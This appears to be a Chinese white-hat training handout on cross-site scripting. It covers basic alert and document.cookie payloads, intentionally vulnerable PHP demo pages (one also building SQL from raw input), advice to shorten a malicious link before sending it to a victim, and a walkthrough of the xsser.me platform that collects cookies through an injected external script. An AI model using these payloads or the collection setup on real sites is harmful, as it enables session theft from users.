米斯特白帽培训讲义 漏洞篇 XSS

讲师:gh0stkey

整理:飞龙

协议:CC BY-NC-SA 4.0

跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS 。恶意攻击者往 Web 页面里插入恶意 JavaScript 代码,当用户浏览器该页之时,嵌入 Web 页面里的代码会被执行,从而达到恶意攻击用户的目的。

Payload

Payload 的中文含义是有效载荷,在 XSS 中指代攻击代码或攻击语句。

常见的 Payload 有:

  • 正常弹窗

    • <script>alert(1)</script>
    • <img src=0 onerror=alert(1)>
  • 弹出网站 Cookie
    • <script>alert(document.cookie)</script>
    • <img src=0 onerror=alert(document.cookie)>

分类

总共有三种

  • 反射型:Payload 经过后端,不经过数据库

  • 存储型:Payload 经过后端,经过数据库

  • DOM:Payload 不经过后端

原理:反射型

非持久化,需要欺骗用户点击链接才能触发 XSS 代码(数据库中没有这样的页面和内容)。Payload 一般存在于 URL 或者 HTTP 正文中,需要构造页面,或者构造 URL。

将这段代码保存为xss.php

<?php
header('X-XSS-Protection: 0');
?>
<p>反射型 XSS 演示</p>
<form action="" method="get"><input type="text" name="xss"/><input type="submit" value="test"/>
</form>
<?php
$xss = @$_GET['xss'];
if($xss!==null){echo $xss;
}

我们看到,这段代码中首先包含一个表单,用于向页面自己发送 GET 请求,带一个名为xss的参数。 然后 PHP 会读取该参数,如果不为空,则直接打印出来,我们看到这里不存在任何过滤。也就是说,如果xss中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。

我们部署好这个文件,访问http://localhost/xss.php,如图:

我们直接输入一个 HTML 代码,比如<script>alert(1)</script>,之后点击test

我们可以看到弹窗,也就是我们输入的 HTML 代码被执行了。

之后我们查看元素,这表明,我们输出的内容直接插入到了页面中,解释为<script>标签。

我们可以自定义弹窗中的内容来利用 XSS,比如改成alert(document.cookie)

这个例子中 URL 为http://localhost/xss.php?xss=%3Cscript%3Ealert%281%29%3C%2Fscript%3E,这个 URL 容易引起怀疑,可以使用短网址工具缩短后发送给受害者。

从上面的例子中,我们可以看出,反射型 XSS 的数据流向是:浏览器 -> 后端 -> 浏览器。

原理:存储型

持久化,代码储存在数据库中。如在个人信息或发表文章等地方,假如代码,如果没有过滤或过滤不严,那么这些代码将储存到数据库中,用户访问该页面的时候出发代码执行。这种 XSS 比较危险,容易造成蠕虫,盗窃 Cookie 等。

这里我们把xss.php内容改为(同时数据库中需要配置相应的表):

<?php
header('X-XSS-Protection: 0');
?>
<p>存储型 XSS 演示</p>
<form action="" method="post"><input type="text" name="xss"/><input type="submit" value="test"/>
</form>
<?php
$xss=@$_POST['xss'];
mysql_connect("localhost","root","root");
mysql_select_db("xss");
if($xss!==null){$sql="insert into test(id,payload) values('1',$xss)";$result=mysql_query($sql);echo $result;
}

可以看到,用户输入的内容还是没有过滤,但是不直接显示在页面中,而是插入到了数据库。

我们新建res.php,内容为:

mysql_connect("localhost","root","root");
mysql_select_db("xss");
$sql="select payload from test where id=1";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){echo $row['payload'];
}

该代码从数据库读取了之前插入的内容,并将其显示出来。

我们部署之后首先查看test数据库,确认它是空的:

然后访问xss.php,像之前一样输入 HTML 代码并点击test,如下:

点击之后却发现没有任何动静,但事实上,我们的数据已经插入到了数据库中。

那么,当我们访问res.php查询这个值的时候,代码就会被执行。

所以说,存储型 XSS 的执行位置通常不同于输入位置。我们可以看出,存储行 XSS 的数据流向是:浏览器 -> 后端 -> 数据库 -> 后端 -> 浏览器。

利用

我们可能需要通过 XSS 来获得用户 Cookie 或其他有用信息,利用平台负责接收并保存这些信息。另外,利用平台能够托管利用脚本,于是我们可以向页面只注入一个脚本链接,使长度极大缩短。

这里的 XSS 利用平台使用 xsser.me,大家可以自行下载和搭建。

  • 下载:http://download.csdn.net/detail/gzliu_hit/5606811
  • 搭建:http://blog.csdn.net/god_7z1/article/details/47234989

首先访问主页,你会看到一个登录页面,输入用户名和密码之后点击“登录”:

成功之后会显示主界面,左边是模块列表,右边是项目列表:

我们点击左边“我的项目”旁边的“创建”按钮:

名称和描述可以随便取,不影响使用。输入时候点击“下一步”按钮。之后会出现“配置代码”界面:

我们只选择默认模块,把它展开之后,我们可以看到它的作用是向平台发送一个请求,来收集用户的各种信息。之后点击“下一步”。

然后我们会在首页看到我们的新项目,点击这个项目:

之后点击右上方的查看代码,就可以看到使用方法:

简单来说,MyzcXv?1467719328就是平台所生成的脚本地址,你可以把它放在script或者img标签的src属性中,在把标签插入存在 XSS 漏洞的地方,然后浏览器就会执行。

下面我们点击之前创建的aaa项目。

我们把<script src="..."></script>注入到反射型 XSS 的演示页面中。

提交之后页面没什么动静,但是我们查看利用平台,可以发现新增了一条数据:

附录:

  • XSS 过滤绕过备忘单

  • HTML5 安全备忘单

  • 新手指南:DVWA-1.9全级别教程之XSS

  • 那些年我们一起学XSS

米斯特白帽培训讲义(v2)漏洞篇 XSS相关推荐

  1. 米斯特白帽培训讲义(v2)漏洞篇 第三方风险

    米斯特白帽培训讲义 漏洞篇 第三方风险 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 域名商 域名商就是提供域名购买的站点.我们可以通过站长工具的 WHOIS 查询来查询域 ...

  2. 米斯特白帽培训讲义 漏洞篇 XSS

    米斯特白帽培训讲义 漏洞篇 XSS 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 分类 总共有三种 反射型:经过后端,不经过数据库 存储型:经过后端,经过数据库 DOM:不 ...

  3. 米斯特白帽培训讲义(v2)漏洞篇 Web 中间件

    米斯特白帽培训讲义 漏洞篇 Web 中间件 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 简介 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术 ...

  4. 米斯特白帽培训讲义(v2)漏洞篇 SSRF

    米斯特白帽培训讲义 漏洞篇 SSRF 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 很多 Web 应用都提供了从其他服务器上获取数据的功能.使用用户指定的 URL,web ...

  5. 米斯特白帽培训讲义(v2)漏洞篇 提权

    米斯特白帽培训讲义 漏洞篇 提权 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 ...

  6. 米斯特白帽培训讲义(v2)漏洞篇 文件包含

    米斯特白帽培训讲义 漏洞篇 文件包含 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理 文件包含就是将一个文件包含到自己的文件中执行.它可分为本地包含和远程包含,本地包含 ...

  7. 米斯特白帽培训讲义(v2)漏洞篇 文件上传

    米斯特白帽培训讲义 漏洞篇 文件上传 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 我们首先看一下文件上传的流程图. 其中,浏览器通过上传页面将文件储存到服务器中.一般这些 ...

  8. 米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历

    米斯特白帽培训讲义 漏洞篇 弱口令.爆破.遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜 ...

  9. 米斯特白帽培训讲义 漏洞篇 CSRF

    米斯特白帽培训讲义 漏洞篇 CSRF 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 CSRF(Cross-site request forgery跨站请求伪造,也被称为&q ...

最新文章

  1. 计算机二级无法完成初始化,2012年计算机等级考试二级C语言常见问题:声明和初始化...
  2. excel处置4000行数据卡_【Excel技巧】在Excel中奇偶行提取和奇偶行筛选方法
  3. hashmap存多少条数据_干货 | 面试官想问的HashMap,都在这一篇里面了!
  4. python实践心得体会_“Python自然语言实践”——总结(一),实战
  5. 饭后什么事情正谋杀你的健康
  6. 靠右对其_中重型货车靠右行驶新规实施一周
  7. jQuery 自定义选择器
  8. iOS开发初探篇——UITabBarController
  9. html5 js阻塞加载,js无阻塞加载和defer、async详解_白峰_前端开发者
  10. 0.python class
  11. CMM,CMMI 软件全面质量管理的思想体系
  12. 手把手教你安装Sketch破解版和measure插件 1
  13. filters 传参是什么_vue中filters 传入两个参数 / 使用两个filters的实现方法
  14. 【Python】pandas遍历读取excel文件,修改并保存(一)
  15. P3332 [ZJOI2013]K大数查询 - 整体二分-区间修改
  16. 二进制及二进制的转换
  17. 论文分析---APP恶意软件检测
  18. 爬虫快速入门——Request对象的使用
  19. 毕业设计 红外热释电的房间人数计数系统 - 单片机 物联网嵌入式
  20. 6种让机器人实现避障的方法

热门文章

  1. (5)FPGA面试题同步电路和异步电路
  2. STM32驱动LCD实战
  3. php限制下载文件格式,php下载文件源代码(强制任意文件格式下载)_PHP教程
  4. mysql 事务 隔离级别_MySQL的四种事务隔离级别
  5. java常用设计模式七:装饰模式
  6. js中eval 详解
  7. 100行代码搞定抖音短视频App,终于可以和美女合唱了。
  8. springmvc整理
  9. centos7 重置root 密码
  10. Big Event in HDU